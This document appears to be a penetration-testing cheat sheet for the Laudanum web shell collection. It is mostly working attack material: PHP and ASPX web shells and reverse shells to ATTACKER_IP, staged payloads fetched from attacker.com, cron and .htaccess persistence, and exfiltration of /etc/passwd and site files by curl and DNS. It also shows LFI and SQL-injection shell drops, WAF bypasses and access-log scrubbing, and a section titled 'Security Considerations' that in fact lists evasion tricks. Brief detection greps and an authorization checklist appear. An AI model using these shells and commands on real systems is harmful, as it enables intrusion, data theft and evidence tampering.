Overview
Laudanum is a collection of pre-built, injectable web shells and reverse shell scripts designed for authorized penetration testing. It includes shells for multiple web technologies (ASP, ASPX, PHP, Perl, JSP, ColdFusion) and provides payloads for establishing reverse connections, spawning shells, and executing arbitrary commands on compromised web servers. Used by authorized security professionals for post-exploitation and lateral movement exercises.
Installation and Setup
Repository Access
# Clone Laudanum from GitHub
git clone https://github.com/laudanum/laudanum.git
cd laudanum
# List available shells
ls -la
# Directory structure
# ├── aspx/
# ├── asp/
# ├── php/
# ├── perl/
# ├── jsp/
# ├── cfm/
# └── shell_finder/
Linux Installation
# Install dependencies
apt-get update
apt-get install curl wget netcat-openbsd
# Optional: PHP CLI for testing
apt-get install php-cli
# Make scripts executable
chmod +x laudanum/*/shell_finder/*
macOS Installation
# Using Homebrew
brew install curl wget netcat
# Clone repository
git clone https://github.com/laudanum/laudanum.git
# Navigate to directory
cd laudanum
Web Shell Types and Usage
PHP Shells
| Shell File | Type | Purpose |
|---|
php/shell.php | Interactive shell | Full command execution |
php/reverse.php | Reverse shell | Establish reverse connection |
php/upload.php | File upload | Upload files to server |
php/info.php | System info | Enumerate server details |
ASP/ASPX Shells
| Shell File | Type | Purpose |
|---|
aspx/shell.aspx | Interactive shell | Windows server exploitation |
aspx/reverse.aspx | Reverse shell | Reverse ASPX connection |
asp/shell.asp | Legacy shell | Classic ASP applications |
aspx/cmdasp.aspx | Command shell | Execute system commands |
Deploying Web Shells
Basic PHP Shell Deployment
# Copy PHP shell to web directory
cp laudanum/php/shell.php /var/www/html/
# Verify deployment
curl http://target.com/shell.php
# Test command execution
curl "http://target.com/shell.php?cmd=id"
curl "http://target.com/shell.php?cmd=whoami"
curl "http://target.com/shell.php?cmd=uname%20-a"
Obfuscated Shell Upload
# Rename to bypass detection
cp laudanum/php/shell.php /tmp/config.php
# Upload via vulnerable form
# Using curl to POST file
curl -X POST -F "upload=@/tmp/config.php" \
http://target.com/upload.php
# Or use with XXE/LFI vulnerabilities
# URL encode the shell content
echo '<?php system($_GET["c"]); ?>' | base64
# Result: PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOyA/Pg==
Shell Parameter Names
# Common parameter variations
curl "http://target.com/shell.php?cmd=id"
curl "http://target.com/shell.php?c=id"
curl "http://target.com/shell.php?cmd=whoami"
curl "http://target.com/shell.php?command=id"
curl "http://target.com/shell.php?exec=id"
curl "http://target.com/shell.php?system=id"
Reverse Shell Implementation
PHP Reverse Shell
// From laudanum/php/reverse.php
<?php
$sock=fsockopen("ATTACKER_IP",PORT);
exec("/bin/bash -i <&3 >&3 2>&3");
?>
// Usage:
// 1. Modify ATTACKER_IP and PORT
// 2. Set up listener: nc -lvnp PORT
// 3. Upload and access shell
Deploying with Netcat Listener
# Terminal 1: Set up listener
nc -lvnp 4444
# Terminal 2: Access reverse shell
curl http://target.com/reverse.php
# Or upload and execute if automated
# Connection established - full shell access
id
whoami
pwd
ls -la
ASPX Reverse Shell
# Copy ASPX reverse shell
cp laudanum/aspx/reverse.aspx /tmp/
# Modify connection details
sed -i 's/LHOST/192.168.1.100/g' reverse.aspx
sed -i 's/LPORT/4444/g' reverse.aspx
# Upload to ASP.NET application
# Access via: http://target.com/shell.aspx
Identifying Shells
# Use shell_finder to locate Laudanum shells
cd laudanum/shell_finder
# Find PHP shells in directory
./shell_finder.py /path/to/webroot --php
# Find all shell types
./shell_finder.py /path/to/webroot --all
# Recursive search
./shell_finder.py /var/www/html -r
Shell Detection Patterns
# Signature detection
grep -r "shell.php" /var/www/html
grep -r "reverse.aspx" /var/www/html
grep -r "system(" /var/www/html
# Find by suspicious patterns
grep -r "fsockopen\|exec\|passthru" /var/www/html
grep -r "eval(" /var/www/html
grep -r "assert(" /var/www/html
Advanced Deployment Techniques
Multi-Stage Deployment
# Stage 1: Drop initial shell via vulnerability
curl -X POST -d 'file=<?php include("http://attacker.com/shell.php"); ?>' \
http://target.com/vulnerable.php
# Stage 2: Second stage downloads full featured shell
# Shell 1 fetches Shell 2
curl -o /tmp/shell2.php http://attacker.com/shell2.php
# Stage 3: Executes with higher privileges or automation
php /tmp/shell2.php
Encoding and Obfuscation
# Base64 encode shell for bypass
base64 -w0 laudanum/php/shell.php > shell.b64
# Gzip compression
gzip -c laudanum/php/shell.php > shell.php.gz
# ROT13 encoding
tr 'A-Za-z' 'N-ZA-Mn-za-m' < laudanum/php/shell.php > shell.rot13
# Deploy encoded version
echo '<?php include(gzuncompress(base64_decode("ENCODED_CONTENT"))); ?>' > shell.php
Persistence Mechanisms
# Create cron job for persistence
<?php
$cmd = "curl http://attacker.com/shell.php > /tmp/shell.php && php /tmp/shell.php";
exec("echo '*/5 * * * * $cmd' | crontab -");
?>
# Add to startup scripts
echo 'php /var/www/html/shell.php' >> ~/.bashrc
# Modify web server configuration
echo 'php_flag auto_prepend_file /var/www/html/shell.php' >> .htaccess
Exploitation Scenarios
File Upload Vulnerability
# Vulnerable upload handler found
POST /upload.php HTTP/1.1
Host: target.com
Content-Type: multipart/form-data
--boundary
Content-Disposition: form-data; name="file"; filename="image.php"
Content-Type: application/x-php
<?php system($_GET['c']); ?>
--boundary--
# Access shell
curl "http://target.com/uploads/image.php?c=id"
Local File Inclusion (LFI)
# If LFI exists, can include remote shell
http://target.com/page.php?file=http://attacker.com/shell.php
# Or include from /tmp if upload possible
http://target.com/page.php?file=/tmp/shell.php
# For wrapper exploitation
http://target.com/page.php?file=php://filter/convert.base64-encode/resource=shell.php
SQL Injection into File
# If SQL results written to file
'; SELECT '<?php system($_GET["c"]); ?>' INTO OUTFILE '/var/www/html/shell.php'; --
# MySQL example
sqlmap -u "http://target.com/?id=1" --file-write=shell.php --file-dest=/var/www/html/shell.php
Command Execution Through Shells
Basic Commands
| Command | Purpose |
|---|
id | Show current user ID |
whoami | Display current username |
pwd | Print working directory |
ls -la | List directory contents |
cat /etc/passwd | Read system files |
ifconfig | Network configuration |
ps aux | Running processes |
Post-Exploitation Actions
# Enumerate system
uname -a
cat /etc/os-release
df -h
free -m
# Network reconnaissance
netstat -tuln
ss -tulnp
arp -a
route -n
# User enumeration
cat /etc/shadow # If writable
getent passwd
sudo -l
# Privilege escalation checks
find / -perm -4000 2>/dev/null
find / -perm -2000 2>/dev/null
dpkg -l | grep sudo
Data Exfiltration
# Compress sensitive data
tar czf - /var/www/html/ | curl -X POST -d @- http://attacker.com/recv.php
# Encode and transmit
cat /etc/passwd | base64 | curl -d @- http://attacker.com/log.php
# DNS exfiltration (if HTTP blocked)
nslookup $(cat file.txt | base64 -w 0).attacker.com
Security Considerations
Detection and Prevention
# Web Application Firewall (WAF) bypass
# Use URL encoding, double encoding, hex encoding
# Example: system() -> sy%73%74%65%6d()
# Content-Type bypass
# Upload as image but use PHP content
# Magic bytes bypass
# Prepend valid file header to PHP shell
# JPEG: FF D8 FF E0 ... <?php ... ?>
Monitoring and Detection
# Log suspicious shell patterns
grep -l "exec\|system\|passthru\|shell_exec" /var/www/html/*
# Monitor process execution
auditctl -w /var/www/html/ -p wa -k webshell
# Check web server logs
tail -f /var/log/apache2/access.log | grep "system\|exec\|cmd"
# Find suspicious files
find /var/www/html -type f -newer /tmp/marker -ls
Integration with Frameworks
# Use Laudanum shells with msfvenom
msfvenom -p php/reverse_php LHOST=192.168.1.100 LPORT=4444 -o shell.php
# Generate ASP.NET shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f aspx > shell.aspx
# Generate handler
msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.100; set LPORT 4444; run"
Empire/PowerShell Empire
# Generate PowerShell shell
./empire -U "User" -P "Pass" -E "invoke-expression(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"
# Stage through Laudanum PHP shell
<?php
$ps_code = base64_decode($_POST['d']);
exec("powershell -enc $ps_code");
?>
Troubleshooting Common Issues
Shell Not Executing
# Check PHP is enabled
curl http://target.com/info.php
# Verify shell syntax
php -l shell.php
# Check file permissions
ls -la /var/www/html/shell.php
# Should be readable by web server user
# Test with different parameter names
curl "http://target.com/shell.php?cmd=id"
curl "http://target.com/shell.php?c=id"
curl "http://target.com/shell.php?command=id"
Connection Issues
# Test listener is running
netstat -tuln | grep 4444
# Check firewall rules
sudo ufw status
sudo iptables -L -n
# Test reverse shell locally first
php laudanum/php/reverse.php
# With listener running first
nc -lvnp 4444
Output Not Displayed
# Redirect errors to stdout
curl "http://target.com/shell.php?cmd=id%202%3E%261"
# Use alternative shells
<?php passthru($_GET['c']); ?>
<?php shell_exec($_GET['c']); ?>
<?php eval($_POST['c']); ?>
Legal and Ethical Use
Authorization Checklist
- Written scope of work defining authorized targets
- Explicit permission for shell deployment
- Time-limited testing window
- Secure handling and removal of shells post-engagement
- Incident response procedures documented
Post-Engagement Cleanup
# Remove shells after testing
rm /var/www/html/shell.php
rm /var/www/html/reverse.aspx
rm /tmp/shell.php
# Clear logs of shell access
# (With proper authorization)
# grep -v "shell.php" /var/log/apache2/access.log > /tmp/access.log.clean
# Document all shells deployed
echo "shell.php deployed 2026-05-02 10:30 UTC - REMOVED"
References
- Laudanum GitHub Repository
- OWASP Web Shell Testing
- Reverse Shell Cheat Sheet
- Web Application Exploitation Guide
- Penetration Testing Execution Standard (PTES)
